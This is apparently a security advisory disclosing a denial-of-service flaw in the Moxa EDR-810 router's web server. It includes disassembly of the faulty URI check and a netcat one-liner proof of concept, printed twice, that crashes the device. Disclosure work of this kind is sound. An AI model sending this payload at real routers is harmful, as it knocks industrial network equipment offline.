An exploitable denial of service vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP URI can cause a null pointer dereference resulting in the web server crashing. An attacker can send a crafted URI to trigger this vulnerability.
Moxa EDR-810 V4.1 build 17030317
https://www.moxa.com/product/EDR-810.htm
7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE-20 - Improper Input Validation
When the web server is processing HTTP requests it checks the first character of the URI for a / (0x2F). If the first character is not a 0x2F the service will crash.
.text:00061460 LDR R3, [R11,#s1]
.text:00061464 LDRB R3, [R3]
.text:00061468 CMP R3, #0x2F ; '/'
.text:0006146C BEQ loc_61454
echo 'GET A HTTP/1.1' | nc -nv 192.168.127.254 80
echo 'GET A HTTP/1.1' | nc -nv 192.168.127.254 80